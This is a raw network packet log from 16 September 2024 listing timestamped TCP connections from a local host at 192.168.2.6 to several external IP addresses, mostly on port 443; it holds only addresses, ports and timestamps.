                    Sep 16, 2024 21:20:34.124054909 CEST49732443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:20:34.169162035 CEST49732443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:20:34.292592049 CEST49733443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:34.292645931 CEST44349733104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:34.292718887 CEST49733443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:34.293593884 CEST49733443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:34.293608904 CEST44349733104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:34.750214100 CEST44349733104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:34.780227900 CEST49733443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:34.780252934 CEST44349733104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:34.883852005 CEST44349733104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:34.884295940 CEST44349733104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:34.884335041 CEST44349733104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:34.884361029 CEST44349733104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:34.884481907 CEST49733443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:34.884481907 CEST49733443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:34.884525061 CEST44349733104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:34.885008097 CEST44349733104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:34.885063887 CEST49733443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:34.933722019 CEST49733443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:35.334079027 CEST49734443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:35.334147930 CEST44349734188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:35.334252119 CEST49734443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:35.334636927 CEST49734443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:35.334656954 CEST44349734188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:35.852200031 CEST44349734188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:35.854598045 CEST49734443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:35.854623079 CEST44349734188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:36.098707914 CEST44349734188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:36.098762989 CEST44349734188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:36.098973036 CEST49734443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:36.098994017 CEST44349734188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:36.100205898 CEST44349734188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:36.100238085 CEST44349734188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:36.100271940 CEST49734443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:36.100282907 CEST44349734188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:36.100332022 CEST49734443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:36.100692034 CEST44349734188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:36.100811005 CEST44349734188.114.97.3192.168.2.6
                    Sep 16, 2024 21:20:36.100869894 CEST49734443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:36.101284027 CEST49734443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:20:40.445400000 CEST49735443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:40.445465088 CEST44349735104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:40.445549011 CEST49735443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:40.445879936 CEST49735443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:20:40.445904970 CEST44349735104.20.4.235192.168.2.6
                    Sep 16, 2024 21:20:50.662961960 CEST4970380192.168.2.6172.64.149.23
                    Sep 16, 2024 21:20:50.662975073 CEST4970280192.168.2.6172.64.149.23
                    Sep 16, 2024 21:20:50.668311119 CEST8049703172.64.149.23192.168.2.6
                    Sep 16, 2024 21:20:50.668492079 CEST4970380192.168.2.6172.64.149.23
                    Sep 16, 2024 21:20:50.669193029 CEST8049702172.64.149.23192.168.2.6
                    Sep 16, 2024 21:20:50.669372082 CEST4970280192.168.2.6172.64.149.23
                    Sep 16, 2024 21:21:10.921333075 CEST44349735104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:10.921356916 CEST44349735104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:10.921529055 CEST49735443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:10.921596050 CEST44349735104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:10.924949884 CEST49735443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:10.924971104 CEST44349735104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:11.031847954 CEST44349735104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:11.036880016 CEST49735443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:11.036971092 CEST44349735104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:11.151328087 CEST44349735104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:11.151355028 CEST44349735104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:11.151458025 CEST49735443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:11.151498079 CEST44349735104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:11.193933010 CEST49735443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:11.193952084 CEST44349735104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:11.214441061 CEST49735443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:11.214569092 CEST44349735104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:11.214652061 CEST49735443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:11.215059996 CEST49738443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:11.215162039 CEST44349738188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:11.215260029 CEST49738443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:11.215559006 CEST49738443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:11.215595007 CEST44349738188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:11.690809011 CEST44349738188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:11.692718983 CEST49738443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:11.692790985 CEST44349738188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:11.945401907 CEST44349738188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:11.945862055 CEST44349738188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:11.945903063 CEST44349738188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:11.945934057 CEST49738443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:11.945957899 CEST44349738188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:11.946012974 CEST49738443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:11.946660042 CEST44349738188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:11.947424889 CEST44349738188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:11.947470903 CEST44349738188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:11.947493076 CEST49738443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:11.947503090 CEST44349738188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:11.947547913 CEST49738443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:11.947556019 CEST44349738188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:11.947570086 CEST44349738188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:11.947632074 CEST49738443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:11.955117941 CEST49738443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:16.226733923 CEST49739443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:21:16.226825953 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.226975918 CEST49739443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:21:16.227345943 CEST49739443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:21:16.227372885 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.683634996 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.685971022 CEST49739443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:21:16.686006069 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.822974920 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.823515892 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.823534012 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.823632002 CEST49739443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:21:16.823657036 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.823756933 CEST49739443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:21:16.824405909 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.825071096 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.825154066 CEST49739443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:21:16.825161934 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.825881958 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.825978994 CEST49739443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:21:16.825987101 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.829045057 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.829130888 CEST49739443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:21:16.829138041 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.881494045 CEST49739443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:21:16.910383940 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.910614967 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.910650015 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.910696983 CEST49739443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:21:16.910705090 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.910732985 CEST44349739104.21.76.57192.168.2.6
                    Sep 16, 2024 21:21:16.910876036 CEST49739443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:21:16.911851883 CEST49739443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:21:17.023555040 CEST49740443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:17.023643970 CEST44349740104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:17.023818970 CEST49740443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:17.024441957 CEST49740443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:17.024475098 CEST44349740104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:17.486860037 CEST44349740104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:17.487006903 CEST49740443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:17.488989115 CEST49740443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:17.489001036 CEST44349740104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:17.489331961 CEST44349740104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:17.491137981 CEST49740443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:17.531443119 CEST44349740104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:17.620796919 CEST44349740104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:17.620867968 CEST44349740104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:17.620934010 CEST49740443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:17.620961905 CEST44349740104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:17.621437073 CEST44349740104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:17.621496916 CEST49740443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:17.621503115 CEST44349740104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:17.621953011 CEST44349740104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:17.622008085 CEST49740443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:17.622008085 CEST49740443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:17.728554964 CEST49741443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:17.728660107 CEST44349741188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:17.728780031 CEST49741443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:17.729018927 CEST49741443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:17.729055882 CEST44349741188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:18.793517113 CEST44349741188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:18.795448065 CEST49741443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:18.795478106 CEST44349741188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:19.024257898 CEST44349741188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:19.024626970 CEST44349741188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:19.024657011 CEST44349741188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:19.024694920 CEST49741443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:19.024734974 CEST44349741188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:19.024790049 CEST49741443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:19.025504112 CEST44349741188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:19.026211023 CEST44349741188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:19.026241064 CEST44349741188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:19.026274920 CEST49741443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:19.026289940 CEST44349741188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:19.026350975 CEST49741443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:19.026360989 CEST44349741188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:19.026376963 CEST44349741188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:19.026428938 CEST49741443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:19.026618958 CEST49741443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:22.851680994 CEST49743443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:22.851727962 CEST44349743104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:22.851818085 CEST49743443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:22.852134943 CEST49743443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:22.852149010 CEST44349743104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:23.623249054 CEST44349743104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:23.625300884 CEST49743443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:23.625372887 CEST44349743104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:24.764749050 CEST44349743104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:24.765109062 CEST44349743104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:24.765130043 CEST44349743104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:24.765183926 CEST49743443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:24.765218973 CEST44349743104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:24.765294075 CEST49743443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:24.765769005 CEST44349743104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:24.765846014 CEST44349743104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:24.765898943 CEST49743443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:24.774975061 CEST49743443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:25.024422884 CEST49744443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:25.024488926 CEST44349744188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:25.024642944 CEST49744443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:25.024944067 CEST49744443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:25.024960041 CEST44349744188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:25.523204088 CEST44349744188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:25.525640965 CEST49744443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:25.525661945 CEST44349744188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:25.755630016 CEST44349744188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:25.755728006 CEST44349744188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:25.755801916 CEST44349744188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:25.755871058 CEST49744443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:25.755935907 CEST44349744188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:25.756025076 CEST49744443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:25.756685972 CEST44349744188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:25.757004976 CEST44349744188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:25.757023096 CEST44349744188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:25.757088900 CEST49744443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:25.757103920 CEST44349744188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:25.757121086 CEST44349744188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:25.757180929 CEST49744443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:25.757262945 CEST49744443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:25.758109093 CEST49744443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:30.148143053 CEST49745443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:30.148252010 CEST44349745104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:30.148411036 CEST49745443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:30.148679018 CEST49745443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:30.148716927 CEST44349745104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:30.609445095 CEST44349745104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:30.611835003 CEST49745443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:30.611866951 CEST44349745104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:30.730655909 CEST44349745104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:30.730689049 CEST44349745104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:30.730880022 CEST49745443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:30.730945110 CEST44349745104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:30.731069088 CEST44349745104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:30.731127977 CEST49745443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:30.731146097 CEST44349745104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:30.731415033 CEST44349745104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:30.731478930 CEST49745443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:30.739712954 CEST49745443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:31.301460028 CEST49746443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:31.301512003 CEST44349746188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:31.301585913 CEST49746443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:31.301884890 CEST49746443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:31.301898003 CEST44349746188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:31.762494087 CEST44349746188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:31.764375925 CEST49746443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:31.764411926 CEST44349746188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:32.010014057 CEST44349746188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:32.010227919 CEST44349746188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:32.010284901 CEST49746443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:32.010303974 CEST44349746188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:32.010798931 CEST44349746188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:32.010864973 CEST49746443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:32.010870934 CEST44349746188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:32.010957003 CEST44349746188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:32.011009932 CEST49746443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:32.011014938 CEST44349746188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:32.011198997 CEST44349746188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:32.011256933 CEST49746443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:32.011646986 CEST49746443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:36.425030947 CEST49747443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:36.425075054 CEST44349747104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:36.425147057 CEST49747443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:36.425370932 CEST49747443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:36.425381899 CEST44349747104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:36.966732025 CEST44349747104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:36.990087986 CEST49747443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:36.990104914 CEST44349747104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:37.128212929 CEST44349747104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:37.128345013 CEST44349747104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:37.128406048 CEST49747443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:37.128443003 CEST44349747104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:37.133202076 CEST44349747104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:37.133311033 CEST49747443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:37.133320093 CEST44349747104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:37.133339882 CEST44349747104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:37.133393049 CEST49747443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:37.141393900 CEST49747443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:37.530066967 CEST49748443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:37.530179024 CEST44349748188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:37.530263901 CEST49748443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:37.530486107 CEST49748443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:37.530508995 CEST44349748188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:38.336795092 CEST44349748188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:38.339366913 CEST49748443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:38.339418888 CEST44349748188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:38.553725958 CEST44349748188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:38.553864002 CEST44349748188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:38.553947926 CEST49748443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:38.553992987 CEST44349748188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:38.554022074 CEST44349748188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:38.554078102 CEST49748443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:38.554111958 CEST44349748188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:38.554990053 CEST44349748188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:38.555066109 CEST49748443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:38.555067062 CEST44349748188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:38.555092096 CEST44349748188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:38.555145979 CEST49748443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:38.555177927 CEST44349748188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:38.555308104 CEST44349748188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:38.555363894 CEST49748443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:38.555538893 CEST49748443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:42.648935080 CEST49749443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:42.649054050 CEST44349749104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:42.649152994 CEST49749443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:42.649465084 CEST49749443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:42.649504900 CEST44349749104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:43.218318939 CEST44349749104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:43.220196962 CEST49749443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:43.220259905 CEST44349749104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:43.352653027 CEST44349749104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:43.352777958 CEST44349749104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:43.352897882 CEST44349749104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:43.352916002 CEST49749443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:43.352967978 CEST44349749104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:43.353239059 CEST44349749104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:43.353416920 CEST49749443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:43.409722090 CEST49749443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:44.066695929 CEST49750443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:44.066756964 CEST44349750188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:44.066962957 CEST49750443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:44.067368984 CEST49750443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:44.067393064 CEST44349750188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:44.525526047 CEST44349750188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:44.527694941 CEST49750443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:44.527709007 CEST44349750188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:44.761800051 CEST44349750188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:44.761928082 CEST44349750188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:44.762018919 CEST44349750188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:44.762051105 CEST49750443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:44.762064934 CEST44349750188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:44.762708902 CEST44349750188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:44.762799025 CEST44349750188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:44.762805939 CEST49750443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:44.762825966 CEST44349750188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:44.762857914 CEST49750443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:44.763078928 CEST44349750188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:44.763700008 CEST49750443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:44.764027119 CEST49750443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:49.222470999 CEST49751443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:49.222537994 CEST44349751104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:49.222616911 CEST49751443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:49.223295927 CEST49751443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:49.223315001 CEST44349751104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:49.702629089 CEST44349751104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:49.710722923 CEST49751443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:49.710809946 CEST44349751104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:49.841418982 CEST44349751104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:49.841599941 CEST44349751104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:49.841658115 CEST44349751104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:49.841687918 CEST44349751104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:49.841691017 CEST49751443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:49.841739893 CEST44349751104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:49.841762066 CEST49751443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:49.841828108 CEST44349751104.20.4.235192.168.2.6
